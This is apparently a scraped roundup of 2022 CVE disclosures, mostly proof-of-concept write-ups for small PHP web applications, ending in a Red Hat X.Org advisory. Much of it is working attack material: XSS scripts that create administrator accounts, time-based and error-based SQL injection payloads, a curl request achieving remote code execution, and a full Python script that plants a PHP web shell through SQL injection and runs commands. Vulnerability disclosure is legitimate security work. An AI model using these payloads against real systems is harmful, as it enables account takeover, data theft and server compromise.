The ScratchLogin extension through 1.1 for MediaWiki does not escape verification failure messages, which allows users with administrator privileges to perform cross-site scripting (XSS).

<?php use Wikimedia\\Timestamp\\ConvertibleTimestamp; define('USER\_API\_LINK', 'https://api.scratch.mit.edu/users/%s/'); function getAuthenticator() { global $wgScratchLoginAuthenticator; switch ($wgScratchLoginAuthenticator) { case 'cloud': { return ScratchLogin\\Authenticator\\CloudVariableAuthenticator::class; } default: { return ScratchLogin\\Authenticator\\ProjectCommentAuthenticator::class; } } } function getScratchUserRegisteredAt($username) { $apiText = file\_get\_contents(sprintf( USER\_API\_LINK, $username )); //fail loudly if the API call fails if (!isset($http\_response\_header)) { throw new Exception('API call failed'); } //this shouldn't happen, but since this is a security-sensitive component we need to be ultra-defensive if (!strstr($http\_response\_header\[0\], '200 OK')) { throw new Exception('User does not exist'); } $info = json\_decode($apiText, true); $registeredAt = $info\['history'\]\['joined'\]; return new ConvertibleTimestamp($registeredAt); } class ScratchSpecialPage extends SpecialPage { function execute($par) { $request = $this\->getRequest(); $out = $this\->getOutput(); $out\->disallowUserJs(); $this\->setHeaders(); $this\->checkReadOnly(); if ($par == 'reset') { $this\->resetCode( $out, $request ); } else if ($request\->wasPosted()) { $this\->onPost( $out, $request ); } else { $this\->showForm( $out, $request ); } } // show an error followed by the login form again function showError($error, $out, $request) { $out\->addHTML(Html::rawElement('p', \[ 'class' => 'error' \], $error)); $this\->showForm($out, $request); } // $instructions: message key giving instructions for this page // $action: message key for button value function verifForm($out, $request, $instructions, $action) { $authenticator = getAuthenticator(); // this all takes place in a form $out\->addHTML(Html::openElement( 'form', \[ 'method' => 'POST' \] )); $session = $request\->getSession(); $out\->addHTML($authenticator::getInstructions( $instructions, $session, $this )->inContentLanguage()->parseAsBlock()); // show the submit button $out\->addHTML(Html::rawElement( 'input', \[ 'type' => 'submit', 'id' => 'mw-scratchlogin-form-submit', 'value' => wfMessage($action)->inContentLanguage()->plain() \] )); //close the form $out\->addHTML(Html::closeElement( 'form' )); } function verifSucceeded($out, $request) { $session = $request\->getSession(); $authenticator = getAuthenticator(); $username = $authenticator::getAssociatedUsername($session, $this); if ($username == null) { $this\->showError( $authenticator::getMissingMsg($this) ->inContentLanguage()->plain(), $out, $request ); return null; } // now attempt to retrieve the MediaWiki user // associated with whoever commented the verification code $user = User::newFromName($username); // ...if that user does not exist, then show an error // that this account does not exist on the wiki if ($user\->getId() == 0) { $this\->showError( wfMessage('scratchlogin-unregistered', $username) ->inContentLanguage()->parse(), $out, $request ); return null; } try { $wikiUserTimestamp = new ConvertibleTimestamp($user\->getRegistration()); $scratchUserTimestamp = getScratchUserRegisteredAt($username); $diff = $scratchUserTimestamp\->diff($wikiUserTimestamp); if ($diff\->invert) { // Scratch user registered after wiki user. // To prevent disaster, make it error. $this\->showError( wfMessage('scratchlogin-account-age-error', $username) ->inContentLanguage()->parse(), $out, $request ); return null; } } catch (Exception $e) { //in the event of any failure, do NOT allow the login attempt to continue $this\->showError(wfMessage('scratchlogin-api-failure')->inContentLanguage()->parse(), $out, $request); return null; } // clear the verification code in the session so that they have to // use a different code to login as a different user $authenticator::clearAuthCode($session); return $user; } // reset the code associated with the current user's session function doCodeReset($out, $request, $returnto) { $session = $request\->getSession(); $authenticator = getAuthenticator(); $authenticator::clearAuthCode($session); $out\->addWikiMsg('scratchlogin-code-reset', $returnto); } }

CVE-2022-42985: mediawiki-scratch-login/ScratchLogin.common.php at 4d2c1229b558b9cd685961274f20b621d114f4db · InternationalScratchWiki/mediawiki-scratch-login

Hustoj 22.09.22 has a XSS Vulnerability in /admin/problem_judge.php.

**描述问题**  
XSS Vulnerability exists in  

echo $row\['input\_text'\]."\\n";

  
**如何复现**  
Steps to reproduce the behavior:

1.  POST text with xss script to submit.php  
    for example:

id=-1000&language=1&source=asdasdasdasdasd&input\_text=<script src\="/template/bs3/jquery.min.js"\></script\><script\>$.get("/admin/privilege\_add.php").done(function(data){
    re\=/name="postkey" value="(\[\\w\]%2B?)"/g;
    $.post("/admin/privilege\_add.php",{"postkey":re.exec(data)\[1\],"user\_id":"username","rightstr":"administrator","valuestr":"true"
                                  ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)})
})
</script\>

Then you can get a sid.  

2.  Send malicious links to administrators  
    example:

<body\>
<script type\="text/javascript"\>
    function post(URL, PARAMS) {
    var temp \= document.createElement("form");
    temp.action \= URL;
    temp.method \= "post";
    temp.style.display \= "none";
    for (var x in PARAMS) {
        var opt \= document.createElement("textarea");
        opt.name \= x;
        opt.value \= PARAMS\[x\];
        temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    return temp;
}
post("http://192.168.0.25:8080/admin/problem\_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})

</script\>
</body\>

CVE-2022-42187: XSS Vulnerability in /admin/problem_judge.php · Issue #866 · zhblue/hustoj

SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2022-40881: GitHub - Timorlover/SolarView_Compact_6.0_rce_via_network_test.php

A SQL injection vulnerability exits on the Simple Image Gallery System 1.0 application through "id" parameter on the album page.

**Exploit Title: Simple Image Gallery System 1.0 - "id" SQL Injection****Google Dork: N/A****Date: 2020-08-12****Exploit Author: M4sk0ff****Vendor Homepage: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=14903&title=Simple+Image+Gallery+Web+App+using+PHP+Free+Source+Code****Version: Version 1.0****Category: Web Application****Tested on: Kali Linux****CVE : CVE-2021-38819**

Description:

Simple Image Gallery System 1.0 application is vulnerable to SQL injection via the "id" parameter on the album page.

POC:

Step 1. Login to the application with any verified user credentials

Step 2. Click on Albums page and select an albums if created or create by clicking on "Add New" on the top right and select the album.

Step 3. Click on an image and capture the request in burpsuite. Now copy the request and save it as test.req .

Step 4. Run the sqlmap command "sqlmap -r test.req --dbs

Step 5. This will inject successfully and you will have an information disclosure of all databases contents.

Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3' AND 7561=7561 AND 'SzOW'='SzOW

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3' OR (SELECT 9448 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(9448=9448,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SXqA'='SXqA
    
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3' AND (SELECT 1250 FROM (SELECT(SLEEP(5)))aNMX) AND 'qkau'='qkau

CVE-2021-38819: CVE-2021-38819/CVE-2021-38819.md at main · m4sk0ff/CVE-2021-38819

An issue was discovered in BACKCLICK Professional 5.9.63. Due to an exposed internal communications interface, it is possible to execute arbitrary system commands on the server.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-032 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-913: Improper Control of Dynamically-Managed Code Resources CWE-306: Missing Authentication for Critical Function Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44000 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to an exposed internal communications interface, it is possible to execute arbitrary system commands on the server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: A part of the management application is implemented in PHP, which is run in separate FastCGI processes. A bridge facilitates communication between the PHP and Java code. The PHP to Java interface uses an HTTP protocol endpoint at /bc/\*.phpjavabridge which accepts an XML-based request format allowing low-level interaction with Java objects. That interface allows direct invocation of Java methods, e.g. java.lang.Runtime.getRuntime().exec(X), and thereby execution of system commands in the context of the application server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): A suitable request can be constructed and submitted with curl: - ----- > curl -v -i -s -k -X $'PUT' --data-binary $'\\x7f{ ' $'https://externalhost/bc/servlet/servlet.phpjavabridge' \[...\] ls -la /tmp/systemd-private-\[...\]-tomcat9.service-EW826i/tmp/php-rce - -rw-r----- 1 tomcat tomcat 0 Mär 17 14:19 /tmp/systemd-private-\[...\]-tomcat9.service-EW826i/tmp/php-rce - ----- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-032 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-032.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz\_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl Pdr9wggAgJhwDe73i39znBu9RdOCnCPXQJLXmw5f6maSPhothYCJ6en+tRUZGDdD SfedURYFLcy7BPp1KO1eMUdVuvriK3m5Cqp1eYugyhNsruzHiG1LfQ3uA8jNyg+G 30PWxY/q5WoOt3tsHTKNLJZbQTPSALdRaECOwsiBc5vAYGG7AasO2YRFjYsSzkQc 4hgpYlHuuqGXuKodwo/jvr//mNzRpsgfZS3gc1YbSLTTbfxWyO+x3VkOCOJ3jIQY 3BX6EzNyqzf86QV3jmA2AIWEUVQx6NWlDNlbiR9atusDirt3O+hXfcSTpRYwNGLk +fP7SQHkgdJXx+u1Blv4Uhs3F7gfeA== =Zy4q -----END PGP SIGNATURE-----

CVE-2022-44000

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /diagnostic/login.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: hujun

vendors:https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

Vulnerability File: /diagnostic\_0/diagnostic/login.php

POST parameter 'username' exists delayed injection vulnerability

Payload1: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(5)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 118
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%285%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(5)), The server response time is 5 seconds

Payload2: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(10)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2810%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(10)), The server response time is 10 seconds

Payload3: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(15)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2815%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(15)), The server response time is 15 seconds

CVE-2022-43135: bug_report/SQLi-1.md at main · junHVV/bug_report

Revenue Collection System version 1.0 suffers from a persistent cross site scripting vulnerability allowing an authenticated client user to add an administrative user account to the application then log in as the newly created admin.

    # Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated #   client user to add an administrative user account to the application then log in as the newly created admin.To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the'target', 'x_Username', and 'x_Passsword' as required).<script>var target = "http://localhost/rates/admin/usersadd.php";var req = new XMLHttpRequest();req.open("GET", target);req.send();var parser = new DOMParser();resp = req.responseTextvar document = parser.parseFromString(resp, "text/html");var token = document.getElementsByName("token")[0].value;var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";req.open("POST", target);req.withCredentials = true;req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");req.send(params);</script>

Revenue Collection System 1.0 Cross Site Scripting / Authentication Bypass

Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via News articles.

**Summary**  
hi team,  
I found small Stored XSS

**Info**

Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  

**Steps**

Login to account http://xxx.xxx.x.x/admin.php?  

in tab Menu, choose **News articles**  
Click **New News articles** >> in tab **Meta Data** inject code into **Summary** and tab **Main content** >> save  
  
  

**payload:** <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" \`AllowScriptAccess="always">

CVE-2022-44070: Stored XSS in News articles · Issue #3 · hieuminhnv/Zenario-CMS-last-version

Revenue Collection System version 1.0 suffers from an unauthenticated SQL injection vulnerability in step1.php that allows remote attackers to write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.

    # Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to #   write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.#   This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.#   Ex: python3 rcsv1.py 10.10.14.2 "ls"import sys, requestsdef main():  if len(sys.argv) != 3:    print("(+) usage: %s <target> <cmd>" % sys.argv[0])    print('(+) eg: %s 192.168.121.103 "ls"'  % sys.argv[0])    sys.exit(-1)  targetIP = sys.argv[1]  cmd = sys.argv[2]  s = requests.Session()    # Define obscure filename and command parameter to limit exposure and usage of the RCE.  FILENAME = "youcantfindme.php"  CMDVAR = "ohno"    # Define the SQL injection string  sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)    # Write the PHP file to disk using the SQL injection vulnerability  url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)  r1 = s.get(url1)    # Execute the user defined command and display the result  url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)  r2 = s.get(url2)  print(r2.text)  if __name__ == '__main__':  main()

Revenue Collection System 1.0 SQL Injection / Remote Code Execution

Red Hat Security Advisory 2022-8491-01 - X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon. Issues addressed include buffer overflow and memory leak vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: xorg-x11-server security update  
Advisory ID:       RHSA-2022:8491-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8491  
Issue date:        2022-11-16  
CVE Names:         CVE-2022-3550 CVE-2022-3551  
====================================================================  
1. Summary:

An update for xorg-x11-server is now available for Red Hat Enterprise Linux  
7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

X.Org is an open-source implementation of the X Window System. It provides  
the basic low-level functionality that full-fledged graphical user  
interfaces are designed upon.

Security Fix(es):

* xorg-x11-server: buffer overflow in _GetCountedString() in xkb/xkb.c  
(CVE-2022-3550)

* xorg-x11-server: memory leak in ProcXkbGetKbdByName() in xkb/xkb.c  
(CVE-2022-3551)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2140698 - CVE-2022-3550 xorg-x11-server: buffer overflow in _GetCountedString() in xkb/xkb.c  
2140701 - CVE-2022-3551 xorg-x11-server: memory leak in ProcXkbGetKbdByName() in xkb/xkb.c

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
xorg-x11-server-1.20.4-19.el7_9.src.rpm

x86_64:  
xorg-x11-server-Xephyr-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
xorg-x11-server-source-1.20.4-19.el7_9.noarch.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
xorg-x11-server-1.20.4-19.el7_9.src.rpm

noarch:  
xorg-x11-server-source-1.20.4-19.el7_9.noarch.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
xorg-x11-server-1.20.4-19.el7_9.src.rpm

ppc64:  
xorg-x11-server-Xephyr-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-Xorg-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-common-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.ppc64.rpm

ppc64le:  
xorg-x11-server-Xephyr-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-Xorg-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-common-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.ppc64le.rpm

s390x:  
xorg-x11-server-Xephyr-1.20.4-19.el7_9.s390x.rpm  
xorg-x11-server-common-1.20.4-19.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.s390x.rpm

x86_64:  
xorg-x11-server-Xephyr-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
xorg-x11-server-source-1.20.4-19.el7_9.noarch.rpm

ppc64:  
xorg-x11-server-Xdmx-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-Xnest-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-Xvfb-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-Xwayland-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.ppc.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.ppc64.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.ppc.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.ppc64.rpm

ppc64le:  
xorg-x11-server-Xdmx-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-Xnest-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-Xvfb-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-Xwayland-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.ppc64le.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.ppc64le.rpm

s390x:  
xorg-x11-server-Xdmx-1.20.4-19.el7_9.s390x.rpm  
xorg-x11-server-Xnest-1.20.4-19.el7_9.s390x.rpm  
xorg-x11-server-Xvfb-1.20.4-19.el7_9.s390x.rpm  
xorg-x11-server-Xwayland-1.20.4-19.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.s390x.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.i686.rpm  
